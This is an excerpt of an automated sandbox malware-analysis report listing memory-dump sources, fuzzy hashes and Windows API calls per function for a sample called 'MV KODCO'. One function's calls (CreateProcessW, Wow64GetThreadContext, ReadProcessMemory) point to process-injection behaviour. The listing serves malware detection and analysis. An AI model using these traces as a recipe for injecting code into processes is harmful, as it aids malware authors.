                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                          • Instruction ID: 80b82ef646c03fe5929b97447d70bd62a704e103e34bbac1fae3b3ec3b6f4725
                                                          • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                          • Instruction Fuzzy Hash: 245184B1904219AFDF149F64DC81BAEBBB9FF48314F10409EF249A7281DB715A90CF58
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0062C72F
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0062C746
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: a2ec9ecbb1b07c947c0b6dc8f0e004fc749199203d78fe3eb9416c64ece06b61
                                                          • Instruction ID: 65516a43ab129f6a93c769b09915cb885ed005b6c7471d9acf31165a4e0829ed
                                                          • Opcode Fuzzy Hash: a2ec9ecbb1b07c947c0b6dc8f0e004fc749199203d78fe3eb9416c64ece06b61
                                                          • Instruction Fuzzy Hash: 87D05E71A0030EABDB10AB90DC0EF8A776D9704704F0001A0B750E50B1DAF1EB998B54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3748876192e101a8f8f62608647339a5b43797dc46259601ca8e1e6893c6226
                                                          • Instruction ID: 93620695576dfb5d09e91fbcabe80b6fa4fa275d1b3525ea4c0ae2bac1c5d873
                                                          • Opcode Fuzzy Hash: b3748876192e101a8f8f62608647339a5b43797dc46259601ca8e1e6893c6226
                                                          • Instruction Fuzzy Hash: 16F16A71A047419FC710DF24C585B6ABBE6BF88314F10892EF9999B392DB74E905CF82
                                                          APIs
                                                          • _memset.LIBCMT ref: 005E5022
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005E50CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell__memset
                                                          • String ID:
                                                          • API String ID: 928536360-0
                                                          • Opcode ID: f12cf64b3c9984697d92b9ffc6d005c44fc5c03ac8da5b42d0160663c3bf02fc
                                                          • Instruction ID: cd5d03736cb1419ade0233ffdd039fc90fb1245aaaa437ad40ac8bd3aa1f0b4f
                                                          • Opcode Fuzzy Hash: f12cf64b3c9984697d92b9ffc6d005c44fc5c03ac8da5b42d0160663c3bf02fc
                                                          • Instruction Fuzzy Hash: 25319CB0604741CFC325EF25D84469BBBE4FF4A308F00092EF6DA86241E7716948CBA2
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00603973
                                                            • Part of subcall function 006081C2: __NMSG_WRITE.LIBCMT ref: 006081E9
                                                            • Part of subcall function 006081C2: __NMSG_WRITE.LIBCMT ref: 006081F3
                                                          • __NMSG_WRITE.LIBCMT ref: 0060397A
                                                            • Part of subcall function 0060821F: GetModuleFileNameW.KERNEL32(00000000,006A0312,00000104,00000000,00000001,00000000), ref: 006082B1
                                                            • Part of subcall function 0060821F: ___crtMessageBoxW.LIBCMT ref: 0060835F
                                                            • Part of subcall function 00601145: ___crtCorExitProcess.LIBCMT ref: 0060114B
                                                            • Part of subcall function 00601145: ExitProcess.KERNEL32 ref: 00601154
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          • RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000001,00000000,?,?,005FF507,?,0000000E), ref: 0060399F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 1c3ff00e29603cb31dc8215319d0d78d1f1de1a3ac9f17584cb0a4baf753883a
                                                          • Instruction ID: b798775648310bef0fc2074a5f2845b687d13fc8bc1da230b4573be2453b9afc
                                                          • Opcode Fuzzy Hash: 1c3ff00e29603cb31dc8215319d0d78d1f1de1a3ac9f17584cb0a4baf753883a
                                                          • Instruction Fuzzy Hash: B501D6313C52219EF65D3B28DC42A6B634F9B82721F20142EF5059B3D2EEB0AD0146A4
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0062C385,?,?,?,?,?,00000004), ref: 0062C6F2
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0062C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0062C708
                                                          • CloseHandle.KERNEL32(00000000,?,0062C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0062C70F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: 226517c8ee9ad00f8f5e6961a0013ee890d1d51dfc95acb4acd97f1de2957fea
                                                          • Instruction ID: c9319d4dee02c590469b97c11f23debc5c9a09c969712eade43c3db657d976de
                                                          • Opcode Fuzzy Hash: 226517c8ee9ad00f8f5e6961a0013ee890d1d51dfc95acb4acd97f1de2957fea
                                                          • Instruction Fuzzy Hash: 07E08632640224B7D7211B54AC09FCE7B1AAB06770F104110FB14791E097F125118B98
                                                          APIs
                                                          • _free.LIBCMT ref: 0062BB72
                                                            • Part of subcall function 00601C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00607A85), ref: 00601CB1
                                                            • Part of subcall function 00601C9D: GetLastError.KERNEL32(00000000,?,00607A85), ref: 00601CC3
                                                          • _free.LIBCMT ref: 0062BB83
                                                          • _free.LIBCMT ref: 0062BB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                          • Instruction ID: 74632bd2e62ccdcf05fedd0181a3eedd5ced9e35ec234275463bab40d3bf8415
                                                          • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                          • Instruction Fuzzy Hash: E1E0C2A1280B1142EA2865B87E4CEF313CDCF05352704180DB41AEB282CF28F8408CA8
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 005E3A73
                                                            • Part of subcall function 00601405: __lock.LIBCMT ref: 0060140B
                                                            • Part of subcall function 005E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005E3AF3
                                                            • Part of subcall function 005E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005E3B08
                                                            • Part of subcall function 005E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,005E3AA3,?), ref: 005E3D45
                                                            • Part of subcall function 005E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,005E3AA3,?), ref: 005E3D57
                                                            • Part of subcall function 005E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,006A1148,006A1130,?,?,?,?,005E3AA3,?), ref: 005E3DC8
                                                            • Part of subcall function 005E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,005E3AA3,?), ref: 005E3E48
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005E3AB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 924797094-0
                                                          • Opcode ID: 60dca547fded4e286f70535c68a533aa7f1a451b4e874adc5ec80c8810e3be75
                                                          • Instruction ID: 16f78b88e32bb45764489edaf9748a741924c7905dd755a14d0a2129e297fae8
                                                          • Opcode Fuzzy Hash: 60dca547fded4e286f70535c68a533aa7f1a451b4e874adc5ec80c8810e3be75
                                                          • Instruction Fuzzy Hash: 7A11A1719083419BC300EF59D80991ABFE6FB96350F00491EF584872A1DB709944CF92
                                                          APIs
                                                          • ___lock_fhandle.LIBCMT ref: 0060EA29
                                                          • __close_nolock.LIBCMT ref: 0060EA42
                                                            • Part of subcall function 00607BDA: __getptd_noexit.LIBCMT ref: 00607BDA
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                          • String ID:
                                                          • API String ID: 1046115767-0
                                                          • Opcode ID: 75c3fbf35d0b21ee24c003e6812b45906d0c945bd0ca2f497c1391c379f00000
                                                          • Instruction ID: d3211c311b1187a5403d3523b5226f33fe0158ca7de51d9a0bbca2d71f2f220d
                                                          • Opcode Fuzzy Hash: 75c3fbf35d0b21ee24c003e6812b45906d0c945bd0ca2f497c1391c379f00000
                                                          • Instruction Fuzzy Hash: 2A112972AC56208EE75DBF64C84135B7A536F86331F164B48E4700F1E2CBB69C008AA9
                                                          APIs
                                                            • Part of subcall function 0060395C: __FF_MSGBANNER.LIBCMT ref: 00603973
                                                            • Part of subcall function 0060395C: __NMSG_WRITE.LIBCMT ref: 0060397A
                                                            • Part of subcall function 0060395C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000001,00000000,?,?,005FF507,?,0000000E), ref: 0060399F
                                                          • std::exception::exception.LIBCMT ref: 005FF51E
                                                          • __CxxThrowException@8.LIBCMT ref: 005FF533
                                                            • Part of subcall function 00606805: RaiseException.KERNEL32(?,?,0000000E,00696A30,?,?,?,005FF538,0000000E,00696A30,?,00000001), ref: 00606856
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: d61dacc8e695a36acceb68d24eab3ce05dcccff981539b374f1f679d3a2d5cb9
                                                          • Instruction ID: 81ad6b51f4766800e62e3578c060f3e7347e5c9b640e638f40dd1f57f6e986e3
                                                          • Opcode Fuzzy Hash: d61dacc8e695a36acceb68d24eab3ce05dcccff981539b374f1f679d3a2d5cb9
                                                          • Instruction Fuzzy Hash: 58F0C23154422EA7DB08BF98DC059EF7FEEAF00354F644429FA08D25C1DBB0D64087A9
                                                          APIs
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          • __lock_file.LIBCMT ref: 00603629
                                                            • Part of subcall function 00604E1C: __lock.LIBCMT ref: 00604E3F
                                                          • __fclose_nolock.LIBCMT ref: 00603634
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: ec35dcb7501c5d6bb577be9940e724bc47f81cb822abd39230f458e647f8fc1c
                                                          • Instruction ID: cfa091649183862ba1504413f1024e0322c67e82e8ecbe6aad32afe48740b8cd
                                                          • Opcode Fuzzy Hash: ec35dcb7501c5d6bb577be9940e724bc47f81cb822abd39230f458e647f8fc1c
                                                          • Instruction Fuzzy Hash: 07F02B718C0310AAD7597B65C80275F76A75F00331F25810CF410AB3D1CB7C8A019F59
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0107316B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01073201
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01073223
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710772813.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1071000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                          • Instruction ID: 414a31da8c67edeedecf628b006e80f64b6891c0e05850aa80b1ec920b35c3b8
                                                          • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                          • Instruction Fuzzy Hash: 2B12DE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                          APIs
                                                          • __flush.LIBCMT ref: 00602A0B
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __flush__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 4101623367-0
                                                          • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                          • Instruction ID: bf2eb2f4284d9b294dbedb98c59b3b16fb182f2dbc25682f389576fd954a1440
                                                          • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                          • Instruction Fuzzy Hash: 1C4192717807079FDB2C8EAAC8A95AF7BA7AF44360B24852DE855C73C0EB70DD418B44
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 75f0cb0ea2ea25d252e6ce11e96e9fb7216cdef679601e126e9ee04f19915f19
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: E531E770A00109DBC718DF18C482979FBB6FF49340B648AA9E509DBA66DB35EDC1CB80
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 6447f91e2f9b4194757ced2a7f3dcd33dfbff1f952e1d8822e7daaa356e0d931
                                                          • Instruction ID: 277d129fd55b67b8b0e4348f05f0c29f4ebd4fcd3acfa1d5f3ab00c96ebd3312
                                                          • Opcode Fuzzy Hash: 6447f91e2f9b4194757ced2a7f3dcd33dfbff1f952e1d8822e7daaa356e0d931
                                                          • Instruction Fuzzy Hash: 35414C74504655CFEB24DF18C444B2ABFE1BF85308F19899CEA9A4B362C376E845CF52
                                                          APIs
                                                            • Part of subcall function 005E4214: FreeLibrary.KERNEL32(00000000,?), ref: 005E4247
                                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,005E39FE,?,00000001), ref: 005E41DB
                                                            • Part of subcall function 005E4291: FreeLibrary.KERNEL32(00000000), ref: 005E42C4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load
                                                          • String ID:
                                                          • API String ID: 2391024519-0
                                                          • Opcode ID: 3a6bec4070a4643204c251eafb21ca8dc0bd304f09fdb35d0127644a2d1ef430
                                                          • Instruction ID: 28ed2b71f9f4789442926c610c806b5a89d1f497e90c6a95088786c604416e38
                                                          • Opcode Fuzzy Hash: 3a6bec4070a4643204c251eafb21ca8dc0bd304f09fdb35d0127644a2d1ef430
                                                          • Instruction Fuzzy Hash: 6011EE356003466BCB18BF75DC1AF9D7BA5AF80700F10842DF6D6A61C1DF749A449F60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: f61a46be05d48635e64554aa603c15b5994e2f938fac807bd9b2d8cea6880ae8
                                                          • Instruction ID: cb07934a6eb28130aa0ad961247c638ff30e58a79fe9f0cb458d6e870eb95cb0
                                                          • Opcode Fuzzy Hash: f61a46be05d48635e64554aa603c15b5994e2f938fac807bd9b2d8cea6880ae8
                                                          • Instruction Fuzzy Hash: 88213B74504605CFDB24DF64C448B2ABFF1BF84304F18496CEA9647662C735E845CF52
                                                          APIs
                                                          • ___lock_fhandle.LIBCMT ref: 0060AFC0
                                                            • Part of subcall function 00607BDA: __getptd_noexit.LIBCMT ref: 00607BDA
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
